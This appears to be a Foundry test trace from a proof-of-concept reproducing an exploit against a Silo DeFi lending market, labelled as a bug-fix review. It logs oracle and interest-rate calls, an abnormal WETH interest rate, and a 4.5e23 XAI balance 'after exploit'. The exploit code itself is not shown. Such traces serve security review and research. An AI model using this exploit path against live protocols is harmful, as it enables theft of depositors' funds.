    │   │   │   ├─ emit Transfer(from: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, to: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 450000000000000000000000 [4.5e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x8399f10b7ad664e0424efcfe9075b15123396d5a11c834f2ee8f134a6840e428: 0x000000000000000000000000000000000000000000005f4a8c8375d155400000 → 0
    │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 0x000000000000000000000000000000000000000000005f4a8c8375d155400000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   ├─ [32056] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA, 1682622239 [1.682e9]) [staticcall]
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000032d6285a98bd5d009ae000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000644ac707
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2579] 0xC81CF1ff5bB586CD54328ae9563572061cA7b481::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   ├─ [14074] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 1682622239 [1.682e9]) [staticcall]
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000c7d713b49da000186a0000000000000000000000000000000000000000000000de0c4945e17a764000000000000000000000000000000000000000000000000000000000000644ac71f
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [579] 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000064359a0a87b799140ec74c2eb037e27dd4500a15
    │   │   ├─ [14074] 0x64359a0A87B799140Ec74C2eb037E27dD4500A15::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc, 1682622239 [1.682e9]) [staticcall]
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000069e250a8aebd105953f00000000000000000000000000000000000000000000069e2748544fdc21c246000000000000000000000000000000000000000000000000000000000644ac71f
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [579] 0x809a14563A12acb8fc257502813131cA97E6CcF1::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 449767550640560471808134 [4.497e23]
    │   │   ├─ [349] 0x809a14563A12acb8fc257502813131cA97E6CcF1::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 499767550640560471808134 [4.997e23]
    │   │   ├─ [2426] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::priceProvidersRepository() [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007c2ca9d502f2409beceafa68e97a176ff805029f
    │   │   ├─ [28882] 0x7C2ca9D502f2409BeceAfa68E97a176Ff805029F::getPrice(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   ├─ [25669] 0xe37B8c83138caF12E57632D19c06Eb561D47e423::getPrice(0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   │   ├─ [15643] 0x986b5E1e1755e3C2440e960477f25201B0a8bbD4::latestRoundData() [staticcall]
    │   │   │   │   │   ├─ [7410] 0xe5BbBdb2Bb953371841318E1Edfbf727447CeF2E::latestRoundData() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 9460, 518208179144915 [5.182e14], 1682621087 [1.682e9], 1682621087 [1.682e9], 9460
    │   │   │   │   │   └─ ← [Return] 73786976294838215924 [7.378e19], 518208179144915 [5.182e14], 1682621087 [1.682e9], 1682621087 [1.682e9], 73786976294838215924 [7.378e19]
    │   │   │   │   ├─ [1140] 0x986b5E1e1755e3C2440e960477f25201B0a8bbD4::decimals() [staticcall]
    │   │   │   │   │   ├─ [298] 0xe5BbBdb2Bb953371841318E1Edfbf727447CeF2E::decimals() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000001d74ebe7008d3
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000001d74ebe7008d3
    │   │   ├─ [223] 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ [2579] 0x26693A8D6f2A95F9DB48a950D5F2d7f9DE320CcD::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2579] 0x4e27963C016573a5571939404217A3241Af00C7A::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [579] 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 100000 [1e5]
    │   │   ├─ [2579] 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   ├─ [14074] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRate(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 1682622239 [1.682e9]) [staticcall]
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000c7d713b49da000186a0000000000000000000000000000000000000000000000de0c4945e17a764000000000000000000000000000000000000000000000000000000000000644ac71f
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [439] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::protocolShareFee() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   ├─ [349] 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 100000 [1e5]
    │   │   ├─ [579] 0xb02E552D68Cd538f571f72F630366adb616d9466::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [579] 0x22EE742A6773dF30C91b97c7dab590702046Ae95::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [450] 0x7C2ca9D502f2409BeceAfa68E97a176Ff805029F::getPrice(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   ├─ [444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ [2860] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaximumLTV(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000a688906bd8b0000
    │   │   ├─ [2860] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaximumLTV(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000b1a2bc2ec500000
    │   │   ├─ [2860] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaximumLTV(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000bcbce7f1b150000
    │   │   ├─  storage changes:
    │   │   │   @ 0x5b38f733da722fcfe5d9b337b942c59079946084a7cd6eca8286c93cf683420e: 0x0000000000000000000000000000000000000000000069e10de76676d0800000 → 0x0000000000000000000000000000000000000000000069e250a8aebd105953f0
    │   │   │   @ 0xc2087c555306272fc03afb0a060751b394c247011854bbf95bdc01b3c8353eb8: 0 → 0x00000000000000000000000000000000000000000000000023dc9640b1c2d070
    │   │   │   @ 0x5b38f733da722fcfe5d9b337b942c59079946084a7cd6eca8286c93cf6834210: 0x000000000000000000000000000000000000000000000a968163f0a57b400000 → 0x0000000000000000000000000000000000000000000069e2748544fdc21c2460
    │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 0x000000000000000000000000000000000000000000005f4a8c8375d155400000
    │   │   │   @ 0xc2087c555306272fc03afb0a060751b394c247011854bbf95bdc01b3c8353eb9: 0x0000000000000000000000000000000000000000000000010000000064190d3b → 0x00000000000000000000000000000000000000000000000100000000644ac71f
    │   │   └─ ← [Return] 450000000000000000000000 [4.5e23], 449767550640560471808134 [4.497e23]
    │   ├─ [559] 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   └─ ← [Return] 450000000000000000000000 [4.5e23]
    │   ├─ [0] console::log("Balance of XAI after exploit= ", 450000000000000000000000 [4.5e23]) [staticcall]
    │   │   └─ ← [Stop]
    │   ├─ [0] console::log("WETH interest rate after exploit = ", 65536000000000000000000 [6.553e22]) [staticcall]
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 74.23s (69.13s CPU time)

Ran 2 test suites in 75.13s (75.33s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
